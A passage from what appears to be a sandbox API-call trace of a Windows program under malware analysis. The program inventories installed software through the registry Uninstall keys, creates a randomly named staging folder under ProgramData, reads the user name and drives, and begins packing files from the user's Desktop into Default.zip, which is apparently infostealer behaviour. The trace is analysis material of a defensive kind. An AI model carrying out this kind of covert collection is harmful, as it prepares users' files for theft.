0x12 [0110.500] SetLastError (dwErrCode=0x12) [0110.500] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="9.0.30729.6161", lpcbData=0x19eaa4*=0xf) returned 0x0 [0110.501] GetLastError () returned 0x12 [0110.501] SetLastError (dwErrCode=0x12) [0110.501] GetLastError () returned 0x12 [0110.501] SetLastError (dwErrCode=0x12) [0110.501] GetLastError () returned 0x12 [0110.501] SetLastError (dwErrCode=0x12) [0110.501] GetLastError () returned 0x12 [0110.501] SetLastError (dwErrCode=0x12) [0110.501] RegCloseKey (hKey=0x518) returned 0x0 [0110.501] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1f, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.501] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}") returned 90 [0110.501] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.501] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x19eaa4*=0x3e) returned 0x0 [0110.501] GetLastError () returned 0x12 [0110.501] SetLastError (dwErrCode=0x12) [0110.502] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="11.0.61030", lpcbData=0x19eaa4*=0xb) returned 0x0 [0110.502] GetLastError () returned 0x12 [0110.502] SetLastError (dwErrCode=0x12) [0110.502] GetLastError () returned 0x12 [0110.502] SetLastError (dwErrCode=0x12) [0110.502] GetLastError () returned 0x12 [0110.502] SetLastError (dwErrCode=0x12) [0110.502] GetLastError () returned 0x12 [0110.502] SetLastError (dwErrCode=0x12) [0110.502] RegCloseKey (hKey=0x518) returned 0x0 [0110.502] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x20, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.502] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}") returned 90 [0110.502] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.502] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x19eaa4*=0x3b) returned 0x0 [0110.503] GetLastError () returned 0x12 [0110.503] SetLastError (dwErrCode=0x12) [0110.503] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="11.0.61030", lpcbData=0x19eaa4*=0xb) returned 0x0 [0110.503] GetLastError () returned 0x12 [0110.503] SetLastError (dwErrCode=0x12) [0110.503] GetLastError () returned 0x12 [0110.503] SetLastError (dwErrCode=0x12) [0110.503] GetLastError () returned 0x12 [0110.503] SetLastError (dwErrCode=0x12) [0110.503] GetLastError () returned 0x12 [0110.503] SetLastError (dwErrCode=0x12) [0110.503] RegCloseKey (hKey=0x518) returned 0x0 [0110.503] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x21, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.504] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 90 [0110.504] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.504] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x19eaa4*=0x3d) returned 0x0 [0110.504] GetLastError () returned 0x12 [0110.504] SetLastError (dwErrCode=0x12) [0110.504] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="11.0.61030.0", lpcbData=0x19eaa4*=0xd) returned 0x0 [0110.504] GetLastError () returned 0x12 [0110.504] SetLastError (dwErrCode=0x12) [0110.504] GetLastError () returned 0x12 [0110.504] SetLastError (dwErrCode=0x12) [0110.504] GetLastError () returned 0x12 [0110.504] SetLastError (dwErrCode=0x12) [0110.504] GetLastError () returned 0x12 [0110.504] SetLastError (dwErrCode=0x12) [0110.504] RegCloseKey (hKey=0x518) returned 0x0 [0110.505] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x22, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.505] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 90 [0110.505] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.505] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x19eaa4*=0x3d) returned 0x0 [0110.505] GetLastError () returned 0x12 [0110.505] SetLastError (dwErrCode=0x12) [0110.505] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="12.0.30501.0", lpcbData=0x19eaa4*=0xd) returned 0x0 [0110.505] GetLastError () returned 0x12 [0110.505] SetLastError (dwErrCode=0x12) [0110.505] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x667) returned 0x29a7310 [0110.505] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6ec0 | out: hHeap=0x29a0000) returned 1 [0110.505] GetLastError () returned 0x12 [0110.505] SetLastError (dwErrCode=0x12) [0110.505] GetLastError () returned 0x12 [0110.505] SetLastError (dwErrCode=0x12) [0110.506] GetLastError () returned 0x12 [0110.506] SetLastError (dwErrCode=0x12) [0110.506] RegCloseKey (hKey=0x518) returned 0x0 [0110.506] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x23, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.506] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}") returned 90 [0110.506] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.506] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x19eaa4*=0x3c) returned 0x0 [0110.506] GetLastError () returned 0x12 [0110.506] SetLastError (dwErrCode=0x12) [0110.506] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="10.0.40219", lpcbData=0x19eaa4*=0xb) returned 0x0 [0110.506] GetLastError () returned 0x12 [0110.506] SetLastError (dwErrCode=0x12) [0110.506] GetLastError () returned 0x12 [0110.506] SetLastError (dwErrCode=0x12) [0110.506] GetLastError () returned 0x12 [0110.506] SetLastError (dwErrCode=0x12) [0110.507] GetLastError () returned 0x12 [0110.507] SetLastError (dwErrCode=0x12) [0110.507] RegCloseKey (hKey=0x518) returned 0x0 [0110.507] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x24, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.507] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757") returned 100 [0110.507] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.507] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.507] RegCloseKey (hKey=0x518) returned 0x0 [0110.507] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x25, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.507] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173") returned 100 [0110.507] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.507] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.507] RegCloseKey (hKey=0x518) returned 0x0 [0110.507] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x26, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.507] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860") returned 100 [0110.507] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.508] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.508] RegCloseKey (hKey=0x518) returned 0x0 [0110.508] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x27, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.509] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655") returned 100 [0110.509] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.509] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.509] RegCloseKey (hKey=0x518) returned 0x0 [0110.509] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x28, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.509] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743") returned 100 [0110.509] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.509] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.509] RegCloseKey (hKey=0x518) returned 0x0 [0110.509] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x29, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.509] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063") returned 100 [0110.509] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.509] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.509] RegCloseKey (hKey=0x518) returned 0x0 [0110.509] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x2a, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.509] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573") returned 99 [0110.509] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.509] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.510] RegCloseKey (hKey=0x518) returned 0x0 [0110.510] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x2b, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.510] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}") returned 90 [0110.510] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.510] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x19eaa4*=0x3e) returned 0x0 [0110.510] GetLastError () returned 0x12 [0110.510] SetLastError (dwErrCode=0x12) [0110.510] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="12.0.21005", lpcbData=0x19eaa4*=0xb) returned 0x0 [0110.510] GetLastError () returned 0x12 [0110.510] SetLastError (dwErrCode=0x12) [0110.510] GetLastError () returned 0x12 [0110.510] SetLastError (dwErrCode=0x12) [0110.511] GetLastError () returned 0x12 [0110.511] SetLastError (dwErrCode=0x12) [0110.511] GetLastError () returned 0x12 [0110.511] SetLastError (dwErrCode=0x12) [0110.511] RegCloseKey (hKey=0x518) returned 0x0 [0110.511] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x2c, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0110.511] RegCloseKey (hKey=0x35c) returned 0x0 [0110.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c00 [0110.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0110.512] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0110.512] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970de0 | out: hHeap=0x29a0000) returned 1 [0110.512] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0110.512] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4f0) returned 0x29a69e8 [0110.512] GetLastError () returned 0x12 [0110.512] SetLastError (dwErrCode=0x12) [0110.512] WriteFile (in: hFile=0x28, lpBuffer=0x19d8d4*, nNumberOfBytesToWrite=0x1094, lpNumberOfBytesWritten=0x19d8b4, lpOverlapped=0x0 | out: lpBuffer=0x19d8d4*, lpNumberOfBytesWritten=0x19d8b4*=0x1094, lpOverlapped=0x0) returned 1 [0110.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69e8 | out: hHeap=0x29a0000) returned 1 [0110.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a7310 | out: hHeap=0x29a0000) returned 1 [0110.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69a8 | out: hHeap=0x29a0000) returned 1 [0110.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6818 | out: hHeap=0x29a0000) returned 1 [0110.514] WriteFile (in: hFile=0x28, lpBuffer=0x19db70*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x19db50, lpOverlapped=0x0 | out: lpBuffer=0x19db70*, lpNumberOfBytesWritten=0x19db50*=0x254, lpOverlapped=0x0) returned 1 [0110.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2758 | out: hHeap=0x29a0000) returned 1 [0110.514] CloseHandle (hObject=0x28) returned 1 [0110.515] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x3970f40 [0110.516] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files"), lpSecurityAttributes=0x0) returned 1 [0110.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0110.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x3970f40 [0110.516] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files")) returned 1 [0110.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0110.520] GetLastError () returned 0x12 [0110.520] SetLastError (dwErrCode=0x12) [0110.520] GetLastError () returned 0x12 [0110.520] SetLastError (dwErrCode=0x12) [0110.520] GetLastError () returned 0x12 [0110.520] SetLastError (dwErrCode=0x12) [0110.520] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970f40 [0110.520] GetLastError () returned 0x12 [0110.520] SetLastError (dwErrCode=0x12) [0110.520] GetLastError () returned 0x12 [0110.521] SetLastError (dwErrCode=0x12) [0110.521] GetLastError () returned 0x12 [0110.521] SetLastError (dwErrCode=0x12) [0110.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.521] GetLastError () returned 0x12 [0110.521] SetLastError (dwErrCode=0x12) [0110.521] GetUserNameA (in: lpBuffer=0x19d360, pcbBuffer=0x19d35c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19d35c) returned 1 [0110.605] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0110.605] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0110.605] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.605] GetLogicalDriveStringsA (in: nBufferLength=0x64, lpBuffer=0x19f674 | out: lpBuffer="C:\\") returned 0x4 [0110.605] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970048 [0110.605] GetLastError () returned 0x12 [0110.605] SetLastError (dwErrCode=0x12) [0110.609] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4098) returned 0x29a69e8 [0110.613] CreateFileA (lpFileName="Default.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files\\default.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0110.614] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a68c8 [0110.614] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.614] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x39700d0 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x39700d0, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.614] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a04a0 